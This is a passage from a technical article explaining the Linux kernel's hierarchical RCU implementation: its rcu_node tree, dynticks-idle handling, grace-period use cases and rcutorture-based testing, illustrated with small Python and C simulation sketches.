last of each pair of CPUs to record a quiescent state for the corresponding
grace period.


This results in a significant reduction in lock contention:
instead of six CPUs contending for a single lock each grace period,
we have only three for the upper rcu_node's lock 
(a reduction of 50%) and only
two for each of the lower rcu_nodes' locks (a reduction
of 67%).

The tree of rcu_node structures is embedded into
a linear array in the rcu_state structure,
with the root of the tree in element zero, as shown below for an eight-CPU
system with a three-level hierarchy.
The arrows link a given rcu_node structure to its parent.
Each rcu_node indicates the range of CPUs covered,
so that the root node covers all of the CPUs, each node in the second
level covers half of the CPUs, and each node in the leaf level covers
a pair of CPUs.
This array is allocated statically at compile time based on the value
of NR_CPUS.
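The array layout described above can be reproduced in a short sketch.  It is an illustration rather than the kernel's code: the kernel sizes the array statically from NR_CPUS at compile time, while this version builds it at run time, and the RcuNode fields and the build_rcu_node_array() helper are names made up for the example.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class RcuNode:
    level: int               # 0 is the root
    lo: int                  # first CPU covered
    hi: int                  # last CPU covered (inclusive)
    parent: Optional[int]    # array index of the parent, None for the root


def build_rcu_node_array(nr_cpus: int, fanout: int) -> List[RcuNode]:
    """Lay out a tree of nodes in a flat list, root first, leaves last."""
    # Count the nodes needed at each level, working up from the leaves.
    counts = []
    n = nr_cpus
    while True:
        n = -(-n // fanout)          # ceiling division
        counts.append(n)
        if n == 1:
            break
    counts.reverse()                 # root level first

    nodes: List[RcuNode] = []
    level_start: List[int] = []
    for level, count in enumerate(counts):
        level_start.append(len(nodes))
        span = fanout ** (len(counts) - level)   # CPUs covered by each node
        for i in range(count):
            lo = i * span
            hi = min(lo + span, nr_cpus) - 1
            parent = None if level == 0 else level_start[level - 1] + i // fanout
            nodes.append(RcuNode(level, lo, hi, parent))
    return nodes


for index, node in enumerate(build_rcu_node_array(8, 2)):
    print(index, node)
```

For eight CPUs and a fanout of two, this yields seven entries: the root in element zero, two second-level nodes, and four leaves that each cover a pair of CPUs.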


The following sequence of six figures shows how grace periods are detected.
In the first figure, no CPU has yet passed through a quiescent state,
as indicated by the red rectangles.
Suppose that all six CPUs simultaneously try to tell RCU that they have
passed through a quiescent state.
Only one of each pair will be able to acquire the lock on the
corresponding lower rcu_node, and so the second figure
shows the result if the lucky CPUs are numbers 0, 3, and 5, as indicated
by the green rectangles.
Once these lucky CPUs have finished, then the other CPUs will acquire
the lock, as shown in the third figure.
Each of these CPUs will see that they are the last in their group,
and therefore all three will attempt to move to the upper
rcu_node.
Only one at a time can acquire the upper rcu_node structure's
lock, and the fourth, fifth, and sixth figures show the sequence of
states assuming that CPU 1, CPU 2, and CPU 4 acquire
the lock in that order.
The sixth and final figure in the group shows that all CPUs have passed
through a quiescent state, so that the grace period has ended.
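The six-CPU sequence just described can be replayed in a small simulation.  This is a single-threaded sketch with invented names (Node, pending, report_quiescent_state()); lock acquisition is represented by a counter rather than a real lock, so it shows the order of events and the number of acquisitions, not actual contention.

```python
class Node:
    """Toy tree node: one pending bit per child (CPU or lower node)."""

    def __init__(self, children: int, parent: "Node" = None,
                 index_in_parent: int = 0) -> None:
        self.pending = (1 << children) - 1    # bit set: still waiting
        self.parent = parent
        self.bit_in_parent = 1 << index_in_parent
        self.lock_acquisitions = 0            # stands in for taking the lock


def report_quiescent_state(leaf: Node, cpu_bit: int) -> bool:
    """Record a quiescent state; return True if the grace period has ended."""
    node, bit = leaf, cpu_bit
    while node is not None:
        node.lock_acquisitions += 1
        node.pending &= ~bit
        if node.pending:
            return False      # others in this group have yet to report
        # Last reporter in this group: carry the news to the next level up.
        bit, node = node.bit_in_parent, node.parent
    return True


root = Node(children=3)
leaves = [Node(children=2, parent=root, index_in_parent=i) for i in range(3)]

# CPUs 0, 3, and 5 win their leaf locks first; CPUs 1, 2, and 4 follow and
# then reach the root in that order.
order = [0, 3, 5, 1, 2, 4]
results = [report_quiescent_state(leaves[cpu // 2], 1 << (cpu % 2))
           for cpu in order]
print(results, root.lock_acquisitions)
```

Only the last CPU to report in each pair ever touches the root, so the root's lock is taken three times rather than six.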


In the above sequence, there were never more than three CPUs
contending for any one lock, in happy contrast to Classic RCU,
where all six CPUs might contend.
However, even more dramatic reductions in lock contention are
possible with larger numbers of CPUs.
Consider a hierarchy of rcu_node structures, with
64 lower structures and 64*64=4,096 CPUs, as shown in the following figure.


Here each of the lower rcu_node structures' locks
is acquired by 64 CPUs, a 64-times reduction from the 4,096 CPUs
that would acquire Classic RCU's single global lock.
Similarly, during a given grace period, only one CPU from each of
the lower rcu_node structures will acquire the
upper rcu_node structure's lock, which is again
a 64x reduction from the contention level that would be experienced
by Classic RCU running on a 4,096-CPU system.
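The arithmetic behind these figures is simple enough to check mechanically.  The helper names below are made up for the example, and the model assumes a two-level tree in which exactly one CPU per leaf goes on to the root during each grace period.

```python
def lock_contenders(nr_cpus: int, leaf_fanout: int) -> dict:
    """Worst-case number of CPUs acquiring each kind of lock per grace period."""
    leaves = -(-nr_cpus // leaf_fanout)       # ceiling division
    return {
        "classic": nr_cpus,                   # everybody takes the global lock
        "leaf": min(leaf_fanout, nr_cpus),    # CPUs sharing one leaf node
        "root": leaves,                       # one CPU per leaf reaches the root
    }


def reduction_percent(before: int, after: int) -> int:
    return round(100 * (before - after) / before)


small = lock_contenders(6, 2)
large = lock_contenders(4096, 64)
print(small, reduction_percent(small["classic"], small["root"]),
      reduction_percent(small["classic"], small["leaf"]))
print(large, large["classic"] // large["leaf"])
```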

Quick Quiz 1:
Wait a minute!  With all those new locks, how do you avoid deadlock?

Quick Quiz 2:
Why stop at a 64-times reduction?
Why not go for a few orders of magnitude instead?

Quick Quiz 3:
But I don't care about McKenney's lame excuses in the answer to
Quick Quiz 2!!!
I want to get the number of CPUs contending on a single lock down
to something reasonable, like sixteen or so!!!

The implementation maintains some per-CPU data, such as lists of
RCU callbacks, organized into rcu_data structures.
In addition, rcu (as in call_rcu()) and
rcu_bh (as in call_rcu_bh()) each maintain their own
hierarchy, as shown in the following figure.


Quick Quiz 4:
OK, so what is the story with the colors?

The next section discusses energy conservation.


Towards a Greener RCU Implementation
As noted earlier, an important goal of this effort is to leave sleeping
CPUs lie in order to promote energy conservation.
In contrast, classic RCU will happily awaken each and every sleeping CPU
at least once per grace period in some cases,
which is suboptimal in the case where
a small number of CPUs are busy doing RCU updates and the majority of
the CPUs are mostly idle.
This situation occurs frequently in systems sized for peak loads, and
we need to be able to accommodate it gracefully.
Furthermore, we need to fix a long-standing bug in Classic RCU where
a dynticks-idle CPU servicing an interrupt containing a long-running
RCU read-side critical section will fail to prevent an RCU grace period
from ending.

Quick Quiz 5:
Given such an egregious bug, why does Linux run at all?

This is accomplished by requiring that all CPUs manipulate counters
located in a per-CPU rcu_dynticks structure.
Loosely speaking, these counters have even-numbered values when the
corresponding CPU is in dynticks idle mode, and have odd-numbered values
otherwise.
RCU thus needs to wait for quiescent states only for those CPUs whose
rcu_dynticks counters are odd, and need not wake up sleeping
CPUs, whose counters will be even.
As shown in the following diagram, each per-CPU rcu_dynticks
is shared by the “rcu” and “rcu_bh” implementations.


The following section presents a high-level view of the RCU state machine.

State Machine
At a sufficiently high level, Linux-kernel RCU implementations can
be thought of as state machines, as shown in the following
schematic:


The common-case path through this state machine on a busy system
goes through the two uppermost loops, initializing at the
beginning of each grace period (GP),
waiting for quiescent states (QS), and noting when each CPU passes through
its first quiescent state for a given grace period.
On such a system, quiescent states will occur on each context switch,
or, for CPUs that are either idle or executing user-mode code, each
scheduling-clock interrupt.
CPU-hotplug events will take the state machine through the
“CPU Offline” box, while the presence of “holdout”
CPUs that fail to pass through quiescent states quickly enough will exercise
the path through the “Send resched IPIs to Holdout CPUs” box.
RCU implementations that avoid unnecessarily awakening dyntick-idle
CPUs will mark those CPUs as being in an extended quiescent state,
taking the “Y” branch out of the “CPUs in dyntick-idle
Mode?” decision diamond (but note that CPUs in dyntick-idle mode
will not be sent resched IPIs).
Finally, if CONFIG_RCU_CPU_STALL_DETECTOR is enabled,
truly excessive delays in reaching quiescent states will exercise the
“Complain About Holdout CPUs” path.

The events in the above state schematic interact with different
data structures, as shown below:


However, the state schematic does not directly translate into C code
for any of the RCU implementations.
Instead, these implementations are coded as an event-driven system within
the kernel.
Therefore, the following section describes some “use cases”,
or ways in which the RCU algorithm traverses the above state schematic
as well as the relevant data structures.


Use Cases
This section gives an overview of several “use cases”
within the RCU implementation, listing the data structures touched
and the functions invoked.
The use cases are as follows:


	Start a new grace period.
 
	Pass through a quiescent state.
 
	Announce a quiescent state to RCU.
 
	Enter and leave dynticks idle mode.
 
	Interrupt from dynticks idle mode.
 
	NMI from dynticks idle mode.
 
	Note that a CPU is in dynticks idle mode.
 
	Offline a CPU.
 
	Online a CPU.
 
	Detect a too-long grace period.

Each of these use cases is described in the following sections.


Start a New Grace Period
The rcu_start_gp() function starts a new grace period.
This function is invoked when a CPU having callbacks waiting for a
grace period notices that no grace period is in progress.

The rcu_start_gp() function updates state in
the rcu_state and rcu_data structures
to note the newly started grace period,
acquires the ->onofflock (and disables irqs) to exclude
any concurrent CPU-hotplug operations,
sets the
bits in all of the rcu_node structures to indicate
that all CPUs (including this one) must pass through a quiescent
state,
and finally
releases the ->onofflock.

The bit-setting operation is carried out in two phases.
First, the non-leaf rcu_node structures' bits are set without
holding any additional locks, and then finally each leaf rcu_node
structure's bits are set in turn while holding that structure's
->lock.

Quick Quiz 6:
But what happens if a CPU tries to report going through a quiescent
state (by clearing its bit) before the bit-setting CPU has finished?

Quick Quiz 7:
And what happens if all CPUs try to report going through a quiescent
state before the bit-setting CPU has finished, thus ending the new
grace period before it starts?
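
The two-phase bit setting, and the quiescent-state reports that the two
preceding Quick Quizzes ask about, can be modeled in a few lines of
user-space C.
This is only a sketch under loud assumptions: the names tree_init(),
start_gp_model(), and cpu_quiet_model(), the tiny fanout of four, and the
two-leaf tree are all made up for illustration, the fields are merely
patterned after rcu_node, and all locking and irq disabling is omitted
because the model is single-threaded.

```c
#include <assert.h>
#include <stddef.h>

#define FANOUT  4                   /* assumed tiny fanout, for readability */
#define NLEAVES 2
#define NCPUS   (FANOUT * NLEAVES)

/* Hypothetical, simplified stand-in for an rcu_node structure. */
struct node {
	unsigned long qsmask;       /* children still owing a quiescent state */
	unsigned long qsmaskinit;   /* children that are online */
	unsigned long grpmask;      /* this node's bit in its parent's qsmask */
	struct node *parent;        /* NULL for the root */
};

static struct node root;
static struct node leaf[NLEAVES];
static int gp_in_progress;

/* Build a two-level tree with every CPU online and no grace period. */
static void tree_init(void)
{
	root.parent = NULL;
	root.grpmask = 0;
	root.qsmaskinit = (1UL << NLEAVES) - 1;
	root.qsmask = 0;
	for (int i = 0; i < NLEAVES; i++) {
		leaf[i].parent = &root;
		leaf[i].grpmask = 1UL << i;
		leaf[i].qsmaskinit = (1UL << FANOUT) - 1;
		leaf[i].qsmask = 0;
	}
	gp_in_progress = 0;
}

/* Phase one sets the non-leaf bits, phase two sets each leaf in turn. */
static void start_gp_model(void)
{
	gp_in_progress = 1;
	root.qsmask = root.qsmaskinit;
	for (int i = 0; i < NLEAVES; i++)
		leaf[i].qsmask = leaf[i].qsmaskinit;  /* real code holds the leaf's lock */
}

/* Report a quiescent state for cpu; returns 1 if the report was recorded. */
static int cpu_quiet_model(int cpu)
{
	struct node *np = &leaf[cpu / FANOUT];
	unsigned long mask = 1UL << (cpu % FANOUT);

	for (;;) {
		if (!(np->qsmask & mask))
			return 0;           /* bit already clear: drop the report */
		np->qsmask &= ~mask;
		if (np->qsmask != 0)
			return 1;           /* others at this level still owe a report */
		if (np->parent == NULL)
			break;              /* root is now empty */
		mask = np->grpmask;         /* last one out: move up a level */
		np = np->parent;
	}
	gp_in_progress = 0;                 /* every CPU has checked in */
	return 1;
}
```

In this model, a report that arrives before start_gp_model() has run finds
its bit clear and is simply dropped, while the last CPU to report clears
its leaf, then the root, and thereby ends the grace period.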


Pass Through a Quiescent State
The rcu and rcu_bh flavors of RCU have different sets of quiescent
states.
Quiescent states for rcu are context switch, idle (either dynticks or
the idle loop), and user-mode execution, while quiescent states for
rcu_bh are any code outside of softirq with interrupts enabled.
Note that a quiescent state for rcu is also a quiescent state
for rcu_bh.
Quiescent states for rcu are recorded by invoking rcu_qsctr_inc(),
while quiescent states for rcu_bh are recorded by invoking
rcu_bh_qsctr_inc().
These two functions record their state in the current CPU's
rcu_data structure.

These functions are invoked from the scheduler, from
__do_softirq(), and from rcu_check_callbacks().
This latter function is invoked from the scheduling-clock interrupt,
and analyzes state to determine whether this interrupt occurred within
a quiescent state, invoking rcu_qsctr_inc() and/or
rcu_bh_qsctr_inc(), as appropriate.
It also raises RCU_SOFTIRQ, which results in
rcu_process_callbacks() being invoked on the current
CPU at some later time from softirq context.
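
The decision made from the scheduling-clock interrupt can be sketched as
follows.
This is a simplified user-space model, not the kernel's code: the
structure names, the field names, and the "_model" function names are
assumptions, and the treatment of an interrupt that arrives while an idle
CPU is running a softirq handler is a guess on my part.
Raising RCU_SOFTIRQ is left out entirely.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical per-CPU record, standing in for the two rcu_data structures. */
struct qs_record {
	bool rcu_qs;        /* a quiescent state for rcu was recorded */
	bool rcu_bh_qs;     /* a quiescent state for rcu_bh was recorded */
};

/* What the scheduling-clock interrupt interrupted (assumed fields). */
struct tick_context {
	bool user;          /* user-mode execution */
	bool idle;          /* the idle loop */
	bool in_softirq;    /* softirq processing */
};

static void rcu_qsctr_inc_model(struct qs_record *r)
{
	r->rcu_qs = true;
}

static void rcu_bh_qsctr_inc_model(struct qs_record *r)
{
	r->rcu_bh_qs = true;
}

/* Decide which flavors saw a quiescent state at this interrupt. */
static void check_callbacks_model(struct qs_record *r,
				  const struct tick_context *c)
{
	if (c->user || (c->idle && !c->in_softirq)) {
		/* An rcu quiescent state is also one for rcu_bh. */
		rcu_qsctr_inc_model(r);
		rcu_bh_qsctr_inc_model(r);
	} else if (!c->in_softirq) {
		/* Kernel code outside of softirq: rcu_bh only. */
		rcu_bh_qsctr_inc_model(r);
	}
}
```

An interrupt taken from user mode therefore records a quiescent state for
both flavors, one taken from ordinary kernel code records one only for
rcu_bh, and one taken from a softirq handler records nothing.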


Announce a Quiescent State to RCU
The aforementioned rcu_process_callbacks() function
has several duties:


	Determining when to take measures to end an over-long grace period
	(via force_quiescent_state()).

	Taking appropriate action when some other CPU detected the end of
	a grace period (via rcu_process_gp_end()).
	“Appropriate action” includes advancing this CPU's
	callbacks and recording the new grace period.
	This same function updates state in response to some other
	CPU starting a new grace period.

	Reporting the current CPU's quiescent states to the core RCU
	mechanism (via rcu_check_quiescent_state(), which
	in turn invokes cpu_quiet()).
	This of course might mark the end of the current grace period.

	Starting a new grace period if there is no grace period in progress
	and this CPU has RCU callbacks still waiting for a grace period
	(via cpu_needs_another_gp() and
	rcu_start_gp()).

	Invoking any of this CPU's callbacks whose grace period has ended
	(via rcu_do_batch()).

These interactions are carefully orchestrated in order to avoid
buggy behavior such as reporting a quiescent state from the previous
grace period against the current grace period.


Enter and Leave Dynticks Idle Mode
The scheduler invokes rcu_enter_nohz() to
enter dynticks-idle mode, and invokes rcu_exit_nohz()
to exit it.
The rcu_enter_nohz() function decrements a per-CPU
dynticks_nesting variable and
increments a per-CPU dynticks counter, the latter of which must
then have an even-numbered value.
The rcu_exit_nohz() function increments this same
per-CPU dynticks_nesting variable,
and again increments the per-CPU dynticks
counter, the latter of which must then have an odd-numbered value.

The dynticks counter can be sampled by other CPUs.
If the value is even, the sampled CPU is in an extended quiescent state.
Similarly, if the counter value changes during a given grace period,
the sampled CPU must have been in an extended quiescent state at some
point during the grace period.
However, there is another dynticks_nmi per-CPU variable
that must also be sampled, as will be discussed below.
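
The even/odd convention and the remote sampling rule can be illustrated
with a minimal user-space model.
The structure and the "_model" function names are assumptions made for
this sketch, which tracks only the dynticks counter (neither
dynticks_nesting nor dynticks_nmi) and omits the memory barriers and irq
disabling that real code would need.

```c
#include <assert.h>

/* Hypothetical stand-in for the per-CPU dynticks counter. */
struct dynticks_model {
	int dynticks;           /* even: dynticks idle, odd: otherwise */
};

/* Entering dynticks-idle mode must leave the counter even. */
static void enter_nohz_model(struct dynticks_model *d)
{
	d->dynticks++;
	assert((d->dynticks & 0x1) == 0);
}

/* Leaving dynticks-idle mode must leave the counter odd. */
static void exit_nohz_model(struct dynticks_model *d)
{
	d->dynticks++;
	assert((d->dynticks & 0x1) == 1);
}

/*
 * Remote check: snap was sampled earlier in the grace period, curr is
 * the value seen now.  An even value means "idle right now", and any
 * change means "was idle at some point since the snapshot".
 */
static int was_in_extended_qs(int snap, int curr)
{
	return (curr & 0x1) == 0 || curr != snap;
}
```

A CPU that stays busy keeps the same odd value and so fails the check,
while a CPU that naps even briefly between the two samples passes it.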


Interrupt from Dynticks Idle Mode
Interrupts from dynticks idle mode are handled by
rcu_irq_enter() and rcu_irq_exit().
The rcu_irq_enter() function increments the
per-CPU dynticks_nesting variable, and, if the prior
value was zero, also increments the dynticks
per-CPU variable (which must then have an odd-numbered value).

The rcu_irq_exit() function decrements the
per-CPU dynticks_nesting variable, and, if the new
value is zero, also increments the dynticks
per-CPU variable (which must then have an even-numbered value).

Note that entering an irq handler exits dynticks idle mode
and vice versa.
This enter/exit anti-correspondence can cause much confusion.
You have been warned.
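
For those who prefer code to warnings, here is a small user-space sketch
of the nesting logic just described.
The structure and the "_model" function names are assumptions, and the
memory barriers and irq disabling of real code are omitted.

```c
#include <assert.h>

/* Hypothetical stand-in for the per-CPU dynticks state. */
struct dynticks_model {
	int dynticks;           /* even: dynticks idle, odd: otherwise */
	int dynticks_nesting;   /* zero while in dynticks idle */
};

/* Entering an irq handler: only the outermost entry leaves idle. */
static void irq_enter_model(struct dynticks_model *d)
{
	if (d->dynticks_nesting++ == 0) {
		d->dynticks++;
		assert((d->dynticks & 0x1) == 1);
	}
}

/* Exiting an irq handler: only the outermost exit re-enters idle. */
static void irq_exit_model(struct dynticks_model *d)
{
	if (--d->dynticks_nesting == 0) {
		d->dynticks++;
		assert((d->dynticks & 0x1) == 0);
	}
}
```

Starting from dynticks idle (both fields zero), a pair of nested
interrupts bumps the dynticks counter exactly twice, once on the
outermost entry and once on the outermost exit.
On a CPU that is not idle, the nesting count starts out nonzero, so the
dynticks counter is left alone.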


NMI from Dynticks Idle Mode
NMIs from dynticks idle mode are handled by rcu_nmi_enter()
and rcu_nmi_exit().
These functions both increment the dynticks_nmi counter,
but only if the aforementioned dynticks counter is even.
In other words, NMIs refrain from manipulating the
dynticks_nmi counter if the NMI occurred in non-dynticks-idle
mode or within an interrupt handler.

The only difference between these two functions is the error checks,
as rcu_nmi_enter() must leave the dynticks_nmi
counter with an odd value, and rcu_nmi_exit() must leave
this counter with an even value.
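
A minimal user-space sketch of this pair of functions follows.
As before, the structure and the "_model" names are assumptions, and
memory barriers are omitted.

```c
#include <assert.h>

/* Hypothetical stand-in for the per-CPU dynticks state. */
struct dynticks_model {
	int dynticks;       /* even: dynticks idle, odd: otherwise */
	int dynticks_nmi;   /* odd only while an NMI from dynticks idle runs */
};

static void nmi_enter_model(struct dynticks_model *d)
{
	if (d->dynticks & 0x1)
		return;     /* not idle, or already in an irq handler */
	d->dynticks_nmi++;
	assert((d->dynticks_nmi & 0x1) == 1);
}

static void nmi_exit_model(struct dynticks_model *d)
{
	if (d->dynticks & 0x1)
		return;     /* same test, so enter and exit stay paired */
	d->dynticks_nmi++;
	assert((d->dynticks_nmi & 0x1) == 0);
}
```

An NMI taken from dynticks idle thus advances dynticks_nmi by two, while
one taken from a busy CPU leaves it untouched.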


Note That a CPU is in Dynticks Idle Mode
The force_quiescent_state() function implements a
two-phase state machine.
In the first phase (RCU_SAVE_DYNTICK), the
dyntick_save_progress_counter() function scans the CPUs that
have not yet reported a quiescent state, recording their per-CPU
dynticks and dynticks_nmi counters.
If these counters both have even-numbered values, then the corresponding
CPU is in dynticks-idle state, which is therefore noted as an extended
quiescent state (reported via cpu_quiet_msk()).
In the second phase (RCU_FORCE_QS), the
rcu_implicit_dynticks_qs() function again scans the CPUs
that have not yet reported a quiescent state (either explicitly or
implicitly during the RCU_SAVE_DYNTICK phase), again checking the
per-CPU dynticks and dynticks_nmi counters.
If each of these has either changed in value or is now even, then
the corresponding CPU has either passed through or is now in dynticks
idle, which as before is noted as an extended quiescent state.

If rcu_implicit_dynticks_qs() finds that a given CPU
has neither been in dynticks idle mode nor reported a quiescent state,
it invokes rcu_implicit_offline_qs(), which checks to see
if that CPU is offline, which is also reported as an extended quiescent
state.
If the CPU is online, then rcu_implicit_offline_qs() sends
it a reschedule IPI in an attempt to remind it of its duty to report
a quiescent state to RCU.

Note that force_quiescent_state() does not directly
invoke either dyntick_save_progress_counter() or
rcu_implicit_dynticks_qs(), instead passing these functions
to an intervening rcu_process_dyntick() function that
abstracts out the common code involved in scanning the CPUs and reporting
extended quiescent states.
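
The two phases, and the way a common scanning function is handed a
per-phase check, can be sketched in user-space C.
Everything here is an assumption made for illustration: the cpu_model
structure, its field names, the "_model" function names, and the flat
array of CPUs standing in for the rcu_node hierarchy.
Locking, offline checks, and reschedule IPIs are left out.

```c
#include <assert.h>

/* Hypothetical per-CPU state for the scan. */
struct cpu_model {
	int dynticks, dynticks_nmi;     /* live counters */
	int snap, snap_nmi;             /* values saved during phase one */
	int needs_qs;                   /* still owes a quiescent state */
};

/* Phase one: save both counters; both even means idle right now. */
static int save_progress_counter_model(struct cpu_model *c)
{
	c->snap = c->dynticks;
	c->snap_nmi = c->dynticks_nmi;
	return (c->snap & 0x1) == 0 && (c->snap_nmi & 0x1) == 0;
}

/* Phase two: each counter must have changed or be even now. */
static int implicit_dynticks_qs_model(struct cpu_model *c)
{
	int dt_ok = c->dynticks != c->snap || (c->dynticks & 0x1) == 0;
	int nmi_ok = c->dynticks_nmi != c->snap_nmi ||
		     (c->dynticks_nmi & 0x1) == 0;

	return dt_ok && nmi_ok;
}

/* Common scan: apply f to each holdout, noting extended quiescent states. */
static int process_dyntick_model(struct cpu_model *cpus, int n,
				 int (*f)(struct cpu_model *))
{
	int reported = 0;

	for (int i = 0; i < n; i++) {
		if (cpus[i].needs_qs && f(&cpus[i])) {
			cpus[i].needs_qs = 0;
			reported++;
		}
	}
	return reported;
}
```

A CPU that is idle during the first scan is retired immediately, one that
dozes off between the two scans is retired by the second, and one that
never goes idle remains a holdout.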

Quick Quiz 8:
And what happens if one CPU comes out of dyntick-idle mode and then
passes through a quiescent state just as another CPU notices that the
first CPU was in dyntick-idle mode?
Couldn't they both attempt to report a quiescent state at the same
time, resulting in confusion?

Quick Quiz 9:
But what if all the CPUs end up in dyntick-idle mode?
Wouldn't that prevent the current RCU grace period from ever ending?

Quick Quiz 10:
Given that force_quiescent_state() is a two-phase state
machine, don't we have double the scheduling latency due to scanning
all the CPUs?


Offline a CPU
CPU-offline events cause rcu_cpu_notify() to invoke
rcu_offline_cpu(), which in turn invokes
__rcu_offline_cpu() on both the rcu and the rcu_bh
instances of the data structures.
This function clears the outgoing CPU's bits so that future grace
periods will not expect this CPU to announce quiescent states,
and further invokes cpu_quiet() in order to announce
the offline-induced extended quiescent state.
This work is performed with the global ->onofflock
held in order to prevent interference with concurrent grace-period
initialization.

Quick Quiz 11:
But the other reason to hold ->onofflock is to prevent
multiple concurrent online/offline operations, right?


Online a CPU
CPU-online events cause rcu_cpu_notify() to invoke
rcu_online_cpu(), which initializes the incoming CPU's
dynticks state, and then invokes rcu_init_percpu_data()
to initialize the incoming CPU's rcu_data structure,
and also to set this CPU's bits (again protected by
the global ->onofflock) so that future grace periods
will wait for a quiescent state from this CPU.
Finally, rcu_online_cpu()
sets up the RCU softirq vector for this CPU.

Quick Quiz 12:
Given all these acquisitions of the global ->onofflock, won't there
be horrible lock contention when running with thousands of CPUs?


Detect a Too-Long Grace Period
When the CONFIG_RCU_CPU_STALL_DETECTOR kernel parameter
is specified, the record_gp_stall_check_time() function
records the time and also a timestamp set three seconds into the future.
If the current grace period still has not ended by that time, the
check_cpu_stall() function will check for the culprit,
invoking print_cpu_stall() if the current CPU is the
holdout, or print_other_cpu_stall() if it is some other CPU.
A two-jiffies offset helps ensure that CPUs report on themselves
when possible, taking advantage of the fact that a CPU can normally
do a better job of tracing its own stack than it can tracing some other
CPU's stack.
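
The timing logic can be sketched as follows.
This is a user-space model under stated assumptions: the tick rate of
1,000 jiffies per second, the macro names, the gp_model structure, and the
"_model" function names are all invented for the example, which returns a
decision rather than printing anything.

```c
#include <assert.h>

#define HZ_MODEL              1000              /* assumed tick rate */
#define STALL_CHECK_DELAY     (3 * HZ_MODEL)    /* three seconds */
#define STALL_OTHER_CPU_DELAY 2                 /* the two-jiffies offset */

enum stall_action { STALL_NONE, STALL_REPORT_SELF, STALL_REPORT_OTHER };

/* Hypothetical per-grace-period timing state. */
struct gp_model {
	unsigned long gp_start;         /* when the grace period began */
	unsigned long jiffies_stall;    /* when complaints may begin */
};

static void record_gp_stall_check_time_model(struct gp_model *gp,
					     unsigned long now)
{
	gp->gp_start = now;
	gp->jiffies_stall = now + STALL_CHECK_DELAY;
}

/* Decide whether this CPU should complain, and about whom. */
static enum stall_action check_cpu_stall_model(const struct gp_model *gp,
					       unsigned long now,
					       int this_cpu_is_holdout,
					       int gp_in_progress)
{
	/* Signed difference so that counter wraparound is tolerated. */
	long delta = (long)(now - gp->jiffies_stall);

	if (!gp_in_progress)
		return STALL_NONE;
	if (this_cpu_is_holdout && delta >= 0)
		return STALL_REPORT_SELF;
	if (delta >= STALL_OTHER_CPU_DELAY)
		return STALL_REPORT_OTHER;
	return STALL_NONE;
}
```

Because other CPUs wait two extra jiffies, a holdout CPU that is still
taking scheduling-clock interrupts gets the first chance to report on
itself.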

Testing
RCU is fundamental synchronization code, so any failure of RCU
results in random, difficult-to-debug memory corruption.
It is therefore extremely important that RCU be highly reliable.
Some of this reliability stems from careful design, but at the
end of the day we must also rely on heavy stress testing, otherwise
known as torture.

Fortunately, although there has been some debate as to exactly
what populations are covered by the provisions of the
Geneva Convention,
it is still the case that it does not apply to software.
Therefore, it is still legal to torture your software.
In fact, it is strongly encouraged, because if you don't torture your
software, it will end up torturing you by crashing at the most
inconvenient times imaginable.

Therefore, we torture RCU quite vigorously using the rcutorture module.

However, it is not sufficient to torture the common-case uses of RCU.
It is also necessary to torture it in unusual situations, for example,
when concurrently onlining and offlining CPUs and when CPUs are concurrently
entering and exiting dynticks idle mode.
I use a
script to online and offline CPUs,
and use the test_no_idle_hz module parameter to rcutorture
to stress-test dynticks idle mode.
Just to be fully paranoid, I sometimes run a kernbench workload in parallel
as well.
Ten hours of this sort of torture on a 128-way machine seems sufficient
to shake out most bugs.

Even this is not the complete story.
As Alexey Dobriyan and Nick Piggin demonstrated in early 2008, it is
also necessary to torture RCU with all relevant combinations of kernel
parameters.
The relevant kernel parameters may be identified using yet another
script, and are as follows:


 CONFIG_CLASSIC_RCU: Classic RCU.
 CONFIG_PREEMPT_RCU: Preemptable (real-time) RCU.
 CONFIG_TREE_RCU: Classic RCU for huge SMP systems.
 CONFIG_RCU_FANOUT: Number of children for each
		rcu_node.
 CONFIG_RCU_FANOUT_EXACT: Balance the
		rcu_node tree.
 CONFIG_HOTPLUG_CPU: Allow CPUs to be offlined
		and onlined.
 CONFIG_NO_HZ: Enable dyntick-idle mode.
 CONFIG_SMP: Enable multi-CPU operation.
 CONFIG_RCU_CPU_STALL_DETECTOR: Enable RCU to detect
		when CPUs go on extended quiescent-state vacations.
 CONFIG_RCU_TRACE: Generate RCU trace files in debugfs.

We ignore the CONFIG_DEBUG_LOCK_ALLOC configuration
variable under the perhaps-naive assumption that hierarchical RCU
could not have broken lockdep.
There are still 10 configuration variables, which would result in
1,024 combinations if they were independent boolean variables.
Fortunately the first three are mutually exclusive, which reduces
the number of combinations down to 384, but CONFIG_RCU_FANOUT
can take on values from 2 to 64, increasing the number of combinations
to 12,096.
This is an infeasible number of combinations.
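
One way to reproduce these counts is sketched below.
The helper count_combinations() is hypothetical, and the breakdown it
encodes (a choice among mutually exclusive RCU flavors, some number of
independent boolean options, and some number of possible fanout values)
is my reading of the arithmetic above rather than anything taken from the
kernel.

```c
#include <assert.h>

/*
 * Number of distinct configurations given `flavors` mutually exclusive
 * RCU implementations, `booleans` independent yes/no options, and
 * `fanouts` possible values of the fanout.
 */
static unsigned long count_combinations(unsigned int flavors,
					unsigned int booleans,
					unsigned int fanouts)
{
	assert(booleans < 32);
	return (unsigned long)flavors * (1UL << booleans) * fanouts;
}
```

Ten independent booleans give count_combinations(1, 10, 1), or 1,024.
Treating the first three variables as one three-way choice leaves seven
booleans, so count_combinations(3, 7, 1) gives 384.
Replacing the fanout boolean with its 63 possible values (2 through 64)
leaves six booleans, so count_combinations(3, 6, 63) gives 12,096.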

One key observation is that only CONFIG_NO_HZ
and CONFIG_PREEMPT can be expected to have changed behavior
if either CONFIG_CLASSIC_RCU or
CONFIG_PREEMPT_RCU is in effect, as only these portions
of the two pre-existing RCU implementations were changed during this effort.
This cuts out almost two thirds of the possible combinations.

Furthermore, not all of the possible values of
CONFIG_RCU_FANOUT produce significantly different results;
in fact, only a few cases really need to be tested separately:


	Single-node “tree”.
	Two-level balanced tree.
	Three-level balanced tree.
	Autobalanced tree, where CONFIG_RCU_FANOUT
	specifies an unbalanced tree, but such that it is auto-balanced
	in absence of CONFIG_RCU_FANOUT_EXACT.
	Unbalanced tree.

Looking further, CONFIG_HOTPLUG_CPU makes sense only
given CONFIG_SMP, and CONFIG_RCU_CPU_STALL_DETECTOR
is independent, and really only needs to be tested once (though someone
even more paranoid than am I might decide to test it both with
and without CONFIG_SMP).
Similarly, CONFIG_RCU_TRACE need only be tested once,
but the truly paranoid (such as myself) will choose to run it both with
and without CONFIG_NO_HZ.

This allows us to obtain excellent coverage of RCU with only 15
test cases.
